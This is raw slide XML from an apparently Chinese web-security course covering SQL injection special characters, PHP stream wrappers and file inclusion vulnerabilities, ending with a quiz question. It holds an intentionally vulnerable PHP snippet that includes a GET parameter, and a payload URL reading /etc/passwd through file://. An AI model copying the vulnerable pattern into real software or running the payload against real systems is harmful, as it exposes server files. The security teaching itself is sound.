                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD460355-F434-10B8-259C-71A860B0D5C9}"/>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Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>" "</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58B25A51-41C6-AE40-77AF-9BB62A489213}"/>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字符串指示器</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="33" name="组合 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D041CD4-6F1C-9D49-7031-BE9C26998A6C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="944961" y="3112348"/>
            <a:ext cx="4791000" cy="748700"/>
            <a:chOff x="766765" y="1052512"/>
            <a:chExt cx="5007618" cy="603084"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="矩形 33">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F04AB147-E64B-1B98-56D7-AA42171DAF91}"/>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28998966-107B-28CB-540D-BA8B8C6615F6}"/>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算术操作符，对于</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SQL server</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DB2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而言为连接</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="36" name="组合 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E223726A-9C8C-E833-8DF0-1793F483A34C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="945713" y="4059531"/>
            <a:ext cx="4791000" cy="748699"/>
            <a:chOff x="766765" y="1052512"/>
            <a:chExt cx="5007618" cy="603084"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37" name="矩形 36">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC808F99-047A-3163-444F-8CC6504312AD}"/>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B25D1E7F-4583-4661-80EF-049232291498}"/>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对于</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Oracle</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PostgreSQL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而言为连接</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="39" name="组合 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82A62EC0-7162-1CC6-2EA7-ADC53DFBEE85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="945713" y="5019926"/>
            <a:ext cx="4791000" cy="468312"/>
            <a:chOff x="766765" y="1052512"/>
            <a:chExt cx="5007618" cy="603084"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="40" name="矩形 39">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0C3B632-6E62-8A9B-085E-CC9D0A1D4B54}"/>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Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>;</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089B3EE8-72D9-1110-4D53-576C9023CD19}"/>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语句终结符</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="42" name="组合 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BABE0B8C-BB6A-6137-BC81-20CA943913E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6473863" y="1778753"/>
            <a:ext cx="4791000" cy="748700"/>
            <a:chOff x="766765" y="1052512"/>
            <a:chExt cx="5007618" cy="603084"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="43" name="矩形 42">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DFF5C53B-B5BF-BA7C-E71C-B89B293A81E2}"/>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endPar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7F42EF46-0D82-447A-D876-B768A038F7E2}"/>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通配符，用于字符串，如</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>'%abc'</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>匹配以</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>abc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>结尾的字符串</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grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="45" name="组合 44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FC39CB2-06F6-D076-5EE1-37135AA6985F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6473863" y="2737916"/>
            <a:ext cx="4791000" cy="468312"/>
            <a:chOff x="766765" y="1052512"/>
            <a:chExt cx="5007618" cy="603084"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="矩形 45">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8123E641-DA6F-CA28-5081-94AC0695C6C7}"/>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Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>--</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795B91C6-6533-6969-220C-E4F63500F74C}"/>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单行注释</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="48" name="组合 47">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80F902A3-69FD-1D1D-FA68-B006C265B5F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6473863" y="3392736"/>
            <a:ext cx="4791000" cy="468312"/>
            <a:chOff x="766765" y="1052512"/>
            <a:chExt cx="5007618" cy="603084"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49" name="矩形 48">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C289EAEA-72AA-46E1-E6BF-810EB0B7A84A}"/>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Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>#</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0" name="矩形 49">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2FB49E6-1B70-5A50-18C9-A8F6509387DE}"/>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单行注释</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="51" name="组合 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C396BA5B-4FC4-B0D9-9AA8-5B143A5C8DEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6486393" y="4064780"/>
            <a:ext cx="4791000" cy="468312"/>
            <a:chOff x="766765" y="1052512"/>
            <a:chExt cx="5007618" cy="603084"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="52" name="矩形 51">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B734D62B-6646-6D22-5CED-A9F6E8D950B8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="766765" y="1052513"/>
              <a:ext cx="791454" cy="603083"/>
            </a:xfrm>
            <a:prstGeom prst="rect">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Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>/**/</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3" name="矩形 52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7430A3BD-0600-EAFB-3372-B66482B4072D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1558219" y="1052512"/>
              <a:ext cx="4216164" cy="603083"/>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多行注释</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25562574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773943" y="1145828"/>
            <a:ext cx="1813317"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 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>伪协议</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911424" y="1700808"/>
            <a:ext cx="4824536" cy="1980735"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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PHP</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带有很多内置</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URL</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风格的封装协议，可用于类似</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fopen</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copy()</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file_exists</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和 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>filesize</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的文件系统函数。</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除了这些封装协议，还能注册自定义的封装协议。</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50A5A436-E080-2886-BB19-27CCD35A409E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6456040" y="1145828"/>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常见</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>伪协议</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="文本框 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC34A84A-6192-1DAC-C45A-185FD0EB245B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6456040" y="1700808"/>
            <a:ext cx="4972350" cy="4215706"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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file://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访问本地文件系统</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http://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访问 </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HTTP(s)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网址</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ftp://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访问 </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FTP(s) URLs</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php://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访问各个输入</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输出流（</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I/O streams</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zlib://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压缩流</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data://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数据</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glob://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查找匹配的文件路径模式</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phar:// — PHP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归档</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ssh2:// — Secure</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Shell</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2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pP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rar</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 — RAR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pP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ogg</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音频流</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expect:// — </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1"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处理交互式的流</a:t>
            </a:r>
            <a:endPar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61478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文件包含漏洞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481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示例代码</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3" y="1725578"/>
            <a:ext cx="4974269" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Menlo"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>$filename = $_GET[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>'filename’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>($filename);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>?&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Menlo"/>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955BAE50-C6A7-2CA4-E16D-39041B1317FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6313487" y="1725578"/>
            <a:ext cx="5104570" cy="1099468"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>fileInclude.php?filename</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>=file:///</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>/passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>访问，可以访问本地文件：</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1433F794-C8F4-B318-73DB-E09F3D8A0940}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6450969" y="1155219"/>
            <a:ext cx="3548136" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>伪协议</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D21FA32-54F7-2EE3-42F5-B6F1C6A90A96}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6384032" y="3031993"/>
            <a:ext cx="4953000" cy="2952328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2186582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BD189BC-501B-D49F-0B7D-77B6C5239A51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1219200" y="635000"/>
            <a:ext cx="9753600" cy="1079499"/>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下列不属于文件包含漏洞的是</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1F8BFF4-93F9-7D83-5934-CE7DCFD56BBC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2438400" y="1844824"/>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包含本地文件</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4BA8FE6-2391-1BEA-9FF9-38F324B583E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2438400" y="2702074"/>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包含远程文件</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5714EB1E-7CA9-F819-BF5E-783B00655C99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2438400" y="3559324"/>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包含</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PHP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伪协议</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896B9D46-CBAE-48F5-E700-7E4CFEE1EF7E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2438400" y="4416574"/>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包含页眉</a:t>
            </a:r>
            <a:endParaRPr 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B2457ED-C8F2-A173-648A-88CA72F6631F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId7"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1571625" y="190911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2" name="椭圆 11">
            <a:extLst>
